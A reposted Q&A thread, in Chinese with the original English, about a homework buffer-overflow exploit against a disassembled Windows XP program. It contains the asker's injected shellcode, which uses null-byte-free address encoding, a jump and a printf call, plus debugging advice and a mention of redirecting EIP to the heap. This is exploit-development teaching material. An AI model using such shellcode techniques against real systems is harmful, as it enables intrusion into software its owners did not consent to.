汇编程序中的 Printf 不打印

发布于 2024-08-31 02:54:32 字数 4541 浏览 9 评论 0原文

我有一个作业,使用缓冲区溢出来破解程序(通过反汇编,程序是用 C++ 编写的,我没有源代码)。我已经成功了,但我有一个问题。我必须在屏幕上打印一些消息,所以我找到了 printf 函数的地址,将“HACKED”的地址和“%s”的地址推送到堆栈上(按此顺序)并调用该函数。调用的代码顺利通过,但没有打印任何内容。

我尝试像程序中其他地方一样模拟环境,但一定有问题。您知道我做错了什么导致我没有输出吗?非常感谢

编辑:

这个程序运行在 Windows XP SP3 32b 上,用 C++ 编写,Intel asm

有“hack”代码

CPU Disasm
Address   Hex dump          Command                                  Comments
0012F9A3    90              NOP                                      ;hack begins
0012F9A4    90              NOP
0012F9A5    90              NOP
0012F9A6    89E5            MOV EBP,ESP
0012F9A8    83EC 7F         SUB ESP,7F                               ;creating a place for working data
0012F9AB    83EC 7F         SUB ESP,7F
0012F9AE    31C0            XOR EAX,EAX
0012F9B0    50              PUSH EAX
0012F9B1    50              PUSH EAX
0012F9B2    50              PUSH EAX
0012F9B3    89E8            MOV EAX,EBP
0012F9B5    83E8 09         SUB EAX,9
0012F9B8    BA 1406EDFF     MOV EDX,FFED0614                            ;address to jump, it is negative because there mustn't be 00 bytes
0012F9BD    F7DA            NOT EDX
0012F9BF    FFE2            JMP EDX                                     ;I have to jump because there are some values overwritten by the program
0012F9C1    90              NOP
0012F9C2    0090 00000000   ADD BYTE PTR DS:[EAX],DL
0012F9C8    90              NOP
0012F9C9    90              NOP
0012F9CA    90              NOP
0012F9CB    90              NOP
0012F9CC    6C              INS BYTE PTR ES:[EDI],DX                 ; I/O command
0012F9CD    65:6E           OUTS DX,BYTE PTR GS:[ESI]                ; I/O command
0012F9CF    67:74 68        JE SHORT 0012FA3A                        ; Superfluous address size prefix
0012F9D2    2069 73         AND BYTE PTR DS:[ECX+73],CH
0012F9D5    203439          AND BYTE PTR DS:[EDI+ECX],DH
0012F9D8    34 2C           XOR AL,2C
0012F9DA    2066 69         AND BYTE PTR DS:[ESI+69],AH
0012F9DD    72 73           JB SHORT 0012FA52
0012F9DF    74 20           JE SHORT 0012FA01
0012F9E1    3120            XOR DWORD PTR DS:[EAX],ESP
0012F9E3    6C              INS BYTE PTR ES:[EDI],DX                 ; I/O command
0012F9E4    696E 65 7300909 IMUL EBP,DWORD PTR DS:[ESI+65],-6F6FFF8D
0012F9EB    90              NOP
0012F9EC    90              NOP
0012F9ED    90              NOP
0012F9EE    31DB            XOR EBX,EBX                             ; hack continues
0012F9F0    8818            MOV BYTE PTR DS:[EAX],BL               ; writing 00 behind word "HACKED"
0012F9F2    83E8 06         SUB EAX,6
0012F9F5    50              PUSH EAX  ; address of "HACKED"
0012F9F6    B8 3B8CBEFF     MOV EAX,FFBE8C3B
0012F9FB    F7D0            NOT EAX
0012F9FD    50              PUSH EAX   ; address of "%s"
0012F9FE    B8 3897BFFF     MOV EAX,FFBF9738
0012FA03    F7D0            NOT EAX
0012FA05    FFD0            CALL EAX    ;address of printf                             

程序开头

CPU Disasm
Address   Hex dump          Command                                  Comments
00403F40  /$  55            PUSH EBP
00403F41  |.  8BEC          MOV EBP,ESP
00403F43  |.  6A FF         PUSH -1
00403F45  |.  68 AB6D4100   PUSH pop3.00416DAB
00403F4A  |.  64:A1 0000000 MOV EAX,DWORD PTR FS:[0]
00403F50  |.  50            PUSH EAX
00403F51  |.  64:8925 00000 MOV DWORD PTR FS:[0],ESP
00403F58  |.  81EC 4C050000 SUB ESP,54C
00403F5E  |.  6A 00         PUSH 0                                   ; /Arg1 = 0
00403F60  |.  E8 6BDEFFFF   CALL 00401DD0                            ; \pop3.00401DD0
00403F65  |.  83C4 04       ADD ESP,4
00403F68  |.  50            PUSH EAX                                 ; /Arg1
00403F69  |.  E8 DA2D0000   CALL 00406D48                            ; \pop3.00406D48
00403F6E  |.  83C4 04       ADD ESP,4
00403F71  |.  837D 08 02    CMP DWORD PTR SS:[ARG.1],2
00403F75  |.  74 21         JE SHORT 00403F98
00403F77  |.  837D 08 03    CMP DWORD PTR SS:[ARG.1],3
00403F7B  |.  74 1B         JE SHORT 00403F98
00403F7D  |.  8B45 0C       MOV EAX,DWORD PTR SS:[ARG.2]
00403F80  |.  8B08          MOV ECX,DWORD PTR DS:[EAX]
00403F82  |.  51            PUSH ECX
00403F83  |.  68 287D4100   PUSH OFFSET pop3.00417D28                ; ASCII "%s arg: port [log dir]"
00403F88  |.  E8 3A290000   CALL 004068C7                            ; this is probably address of printf, I have source code of previous version of this program, this part is probably same

:这个代码真的很难看,因为我是汇编程序新手,不能有由于缓冲区溢出错误而导致空字节

I have got a homework to hack program using buffer overflow ( with disassambling, program was written in C++, I haven't got the source code ). I have already managed it but I have a problem. I have to print some message on the screen, so I found out address of printf function, pushed address of "HACKED" and address of "%s" on the stack ( in this order ) and called that function. Called code passed well but nothing had been printed.

I have tried to simulate the environment like in other place in the program but there has to be something wrong. Do you have any idea what I am doing wrong that I have no output, please? Thanks a lot

EDIT:

This program is running on Windows XP SP3 32b, written in C++, Intel asm

there is the "hack" code

CPU Disasm
Address   Hex dump          Command                                  Comments
0012F9A3    90              NOP                                      ;hack begins
0012F9A4    90              NOP
0012F9A5    90              NOP
0012F9A6    89E5            MOV EBP,ESP
0012F9A8    83EC 7F         SUB ESP,7F                               ;creating a place for working data
0012F9AB    83EC 7F         SUB ESP,7F
0012F9AE    31C0            XOR EAX,EAX
0012F9B0    50              PUSH EAX
0012F9B1    50              PUSH EAX
0012F9B2    50              PUSH EAX
0012F9B3    89E8            MOV EAX,EBP
0012F9B5    83E8 09         SUB EAX,9
0012F9B8    BA 1406EDFF     MOV EDX,FFED0614                            ;address to jump, it is negative because there mustn't be 00 bytes
0012F9BD    F7DA            NOT EDX
0012F9BF    FFE2            JMP EDX                                     ;I have to jump because there are some values overwritten by the program
0012F9C1    90              NOP
0012F9C2    0090 00000000   ADD BYTE PTR DS:[EAX],DL
0012F9C8    90              NOP
0012F9C9    90              NOP
0012F9CA    90              NOP
0012F9CB    90              NOP
0012F9CC    6C              INS BYTE PTR ES:[EDI],DX                 ; I/O command
0012F9CD    65:6E           OUTS DX,BYTE PTR GS:[ESI]                ; I/O command
0012F9CF    67:74 68        JE SHORT 0012FA3A                        ; Superfluous address size prefix
0012F9D2    2069 73         AND BYTE PTR DS:[ECX+73],CH
0012F9D5    203439          AND BYTE PTR DS:[EDI+ECX],DH
0012F9D8    34 2C           XOR AL,2C
0012F9DA    2066 69         AND BYTE PTR DS:[ESI+69],AH
0012F9DD    72 73           JB SHORT 0012FA52
0012F9DF    74 20           JE SHORT 0012FA01
0012F9E1    3120            XOR DWORD PTR DS:[EAX],ESP
0012F9E3    6C              INS BYTE PTR ES:[EDI],DX                 ; I/O command
0012F9E4    696E 65 7300909 IMUL EBP,DWORD PTR DS:[ESI+65],-6F6FFF8D
0012F9EB    90              NOP
0012F9EC    90              NOP
0012F9ED    90              NOP
0012F9EE    31DB            XOR EBX,EBX                             ; hack continues
0012F9F0    8818            MOV BYTE PTR DS:[EAX],BL               ; writing 00 behind word "HACKED"
0012F9F2    83E8 06         SUB EAX,6
0012F9F5    50              PUSH EAX  ; address of "HACKED"
0012F9F6    B8 3B8CBEFF     MOV EAX,FFBE8C3B
0012F9FB    F7D0            NOT EAX
0012F9FD    50              PUSH EAX   ; address of "%s"
0012F9FE    B8 3897BFFF     MOV EAX,FFBF9738
0012FA03    F7D0            NOT EAX
0012FA05    FFD0            CALL EAX    ;address of printf                             

beginning of the program:

CPU Disasm
Address   Hex dump          Command                                  Comments
00403F40  /$  55            PUSH EBP
00403F41  |.  8BEC          MOV EBP,ESP
00403F43  |.  6A FF         PUSH -1
00403F45  |.  68 AB6D4100   PUSH pop3.00416DAB
00403F4A  |.  64:A1 0000000 MOV EAX,DWORD PTR FS:[0]
00403F50  |.  50            PUSH EAX
00403F51  |.  64:8925 00000 MOV DWORD PTR FS:[0],ESP
00403F58  |.  81EC 4C050000 SUB ESP,54C
00403F5E  |.  6A 00         PUSH 0                                   ; /Arg1 = 0
00403F60  |.  E8 6BDEFFFF   CALL 00401DD0                            ; \pop3.00401DD0
00403F65  |.  83C4 04       ADD ESP,4
00403F68  |.  50            PUSH EAX                                 ; /Arg1
00403F69  |.  E8 DA2D0000   CALL 00406D48                            ; \pop3.00406D48
00403F6E  |.  83C4 04       ADD ESP,4
00403F71  |.  837D 08 02    CMP DWORD PTR SS:[ARG.1],2
00403F75  |.  74 21         JE SHORT 00403F98
00403F77  |.  837D 08 03    CMP DWORD PTR SS:[ARG.1],3
00403F7B  |.  74 1B         JE SHORT 00403F98
00403F7D  |.  8B45 0C       MOV EAX,DWORD PTR SS:[ARG.2]
00403F80  |.  8B08          MOV ECX,DWORD PTR DS:[EAX]
00403F82  |.  51            PUSH ECX
00403F83  |.  68 287D4100   PUSH OFFSET pop3.00417D28                ; ASCII "%s arg: port [log dir]"
00403F88  |.  E8 3A290000   CALL 004068C7                            ; this is probably address of printf, I have source code of previous version of this program, this part is probably same

This code is really ugly because I am new in assembler and there mustn't be null bytes because of buffer-overflow bug

如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。

扫码二维码加入Web技术交流群

发布评论

需要 登录 才能够评论, 你可以免费 注册 一个本站的账号。

评论(2

执笔绘流年 2024-09-07 02:54:32

printf 的参数是否以正确的顺序传递,它们的数量是否正确,并且它们都通过堆栈传递(优化可能意味着改为使用寄存器)。参数数量可变可能会导致参数列表比您的假设更复杂。也许尝试调用puts,这可能会更简单。

编辑:刚刚看到您的编辑,并且您正在尝试分解一堆不应该执行的文本;以 as 开头的代码

0012F9CC    6C              INS BYTE PTR ES:[EDI],DX                 ; I/O command 
0012F9CD    65:6E           OUTS DX,BYTE PTR GS:[ESI]                ; I/O command 
0012F9CF    67:74 68        JE SHORT 0012FA3A                        ; Superfluous address size prefix 
0012F9D2    2069 73         AND BYTE PTR DS:[ECX+73],CH 
0012F9D5    203439          AND BYTE PTR DS:[EDI+ECX],DH 
0012F9D8    34 2C           XOR AL,2C 

实际上只是一段文字,表示“长度为 494,前 1 行”。我发现这是因为 printf 不应该有 INS 和 OUTS。提示:当破解和反汇编代码时,请务必在显示 ASCII 和 UNICODE 的编辑器中并排查看代码,以根除文本文字。

Are you that parameters to printf are passed in the right order, you have the right number of them, and they are all passed through the stack (optimization may mean registers are used instead). The variable number of parameters could result in a more complex parameter list than your assuming. Maybe try a call to puts which could be simpler.

Edit: Just saw your edit, and you're trying to disassemble a bunch of text that should never get executed; The code starting as

0012F9CC    6C              INS BYTE PTR ES:[EDI],DX                 ; I/O command 
0012F9CD    65:6E           OUTS DX,BYTE PTR GS:[ESI]                ; I/O command 
0012F9CF    67:74 68        JE SHORT 0012FA3A                        ; Superfluous address size prefix 
0012F9D2    2069 73         AND BYTE PTR DS:[ECX+73],CH 
0012F9D5    203439          AND BYTE PTR DS:[EDI+ECX],DH 
0012F9D8    34 2C           XOR AL,2C 

is actually just a piece of text saying 'ength is 494,first 1 lines'. I spotted this as printf should not have INS and OUTS. Hint: When hacking and disassembling code always look at it side by side in an editor that shows ASCII and UNICODE to root out text literals.

瞄了个咪的 2024-09-07 02:54:32

我还没有发现错误,但我改变了我的黑客代码的结构,现在它可以工作了。我只发布了一些指令,这些指令将 EIP 从堆栈重定向到我拥有“无限”空间的堆,在这里我可以执行所需的代码。谢谢您的建议。

I haven't found the mistake but I have changed structure of my hack code and now it is working. I am posting only few instructions which redirect EIP out of the stack to the heap where I have "unlimited" space and here I can execute desired code. Thank you for your advice.

~没有更多了~
我们使用 Cookies 和其他技术来定制您的体验包括您的登录状态等。通过阅读我们的 隐私政策 了解更多相关信息。 单击 接受 或继续使用网站,即表示您同意使用 Cookies 和您的相关数据。
原文